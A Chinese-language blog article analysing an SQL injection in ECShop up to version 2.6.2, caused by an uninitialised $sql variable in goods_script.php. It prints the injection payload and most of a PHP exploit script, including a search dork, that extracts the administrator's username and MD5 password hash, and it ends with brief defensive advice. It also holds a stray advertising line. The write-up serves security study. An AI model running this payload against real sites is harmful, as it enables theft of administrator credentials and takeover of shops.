ECShop 注射漏洞分析

ECShop <= v2.6.2 SQL注入漏洞深度解析：管理员凭据泄露的完整攻击链

在电商系统安全漏洞史上，ECShop早期版本曝出的一个高危安全问题，至今仍是经典的教学案例。它深刻揭示了，即便是成熟的商业软件，一处细微的编码疏忽也可能导致整个系统防线崩溃。本文将深入剖析发生在goods_script.php文件中的SQL注入漏洞，完整还原其如何被利用来窃取管理员账号与密码。

免费影视、动漫、音乐、游戏、小说资源长期稳定更新！ 👉 点此立即查看 👈

漏洞根源剖析：未初始化变量的致命隐患

漏洞的核心位于goods_script.php文件的第44行附近。其根本原因在于一个关键变量未被正确初始化。让我们直接查看关键代码片段：

复制代码

if (empty($_GET['type']))

{

…

}

elseif ($_GET['type'] == ‘collection’)

{

…

}

$sql .= ” LIMIT ” . (!empty($_GET[‘goods_num’]) ? intval($_GET[‘goods_num’]) : 10);

$res = $db->query($sql);

你是否发现了问题？关键在于$sql变量。在代码追加LIMIT子句之前，$sql变量并未在任何分支中被明确初始化或赋值。这意味着，攻击者可以通过控制type参数，巧妙地绕过所有前置条件判断，使程序直接执行一个由外部输入、且未经任何过滤的SQL语句片段。这种变量未初始化的低级错误，实质上为SQL注入攻击敞开了大门。

漏洞利用详解：从SQL注入到管理员密码窃取

理解了漏洞原理，攻击路径便清晰可见。攻击者的核心目标是构造一个特殊的type参数值，使程序跳过所有合法分支，直接执行攻击者通过sql参数注入的恶意SQL语句。典型的利用方式是通过发送一个精心构造的POST请求来实现。

攻击载荷的核心SQL语句如下：sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#。这条语句完成了以下关键操作：

1. 从管理员数据表ecs_admin_user中，查询拥有最高权限（action_list字段值为‘all’）的管理员账户。 2. 使用CONCAT函数将用户名与经过MD5加密的密码哈希值用冒号连接起来。 3. 将结果集的列名别名为goods_id，以匹配漏洞代码的上下文环境。 4. 使用#符号注释掉后续可能存在的原生SQL代码，确保注入语句完整执行。

利用脚本发送请求后，会从服务器返回的HTML页面源码中，通过正则表达式提取出泄露的管理员用户名和密码MD5哈希值。一旦成功，攻击者便获得了后台系统的最高权限凭证，后续可进行任意操作，危害极其严重。

自动化利用脚本全览

以下是完整的自动化漏洞利用脚本。再次强调，此脚本仅用于安全研究、渗透测试教学及漏洞验证，严禁用于任何未授权的非法攻击行为。

复制代码

#!/usr/bin/php

print_r(’

+—————————————————————————+

ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit

by puret_t

mail: puretot at gmail dot com

team: http://bbs.wolvez.org

dork: “Powered by ECShop”

+—————————————————————————+

’);

/**

* works with register_globals = On

*/

if ($argc < 3) {

print_r(’

+—————————————————————————+

Usage: php ‘.$argv[0].’ host path

host: target server (ip/hostname)

path: path to ecshop

Example:

php ‘.$argv[0].’ localhost /ecshop/

+—————————————————————————+

’);

exit;

}

error_reporting(7);

ini_set(‘max_execution_time’, 0);

$host = $argv[1];

$path = $argv[2];

$resp = send();

preg_match(‘#href=”“([\S]+):([a-z0-9]{32})”“#’, $resp, $hash);

if ($hash)

exit(“Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n”);

else

exit(“Exploit Failed!\n”);

function send()

{

global $host, $path;

$cmd = ‘sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x’.bin2hex(‘all’).’ LIMIT 1#’;

$data = “POST “.$path.”goods_script.php?type=”.time().” HTTP/1.1\r\n”;

$data .= “Accept: */*\r\n”;

$data .= “Accept-Language: zh-cn\r\n”;

$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;

$data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;

$data .= “Host: $host\r\n”;

$data .= “Content-Length: “.strlen($cmd).”\r\n”;

$data .= “Connection: Close\r\n\r\n”;

$data .= $cmd;

安全反思与防御总结

ECShop这个漏洞的成因极具代表性：首先是对用户输入参数缺乏严格的验证与过滤，其次是关键变量在缺乏安全默认值的情况下被直接使用。这为所有Web开发者敲响了警钟：必须对所有外部输入参数保持高度警惕，严格遵循“最小权限原则”与“默认安全（Secure by Default）”的编码规范。对于仍在使用受影响旧版本ECShop的网站管理员而言，最根本的解决方案是立即升级至官方发布的最新安全版本。

信息安全往往系于细节。一个未被初始化的$sql变量，就足以导致整个电商系统的管理员权限沦陷。这不仅仅是一个技术漏洞，更是对安全开发生命周期（SDLC）和安全意识的一次深刻警示。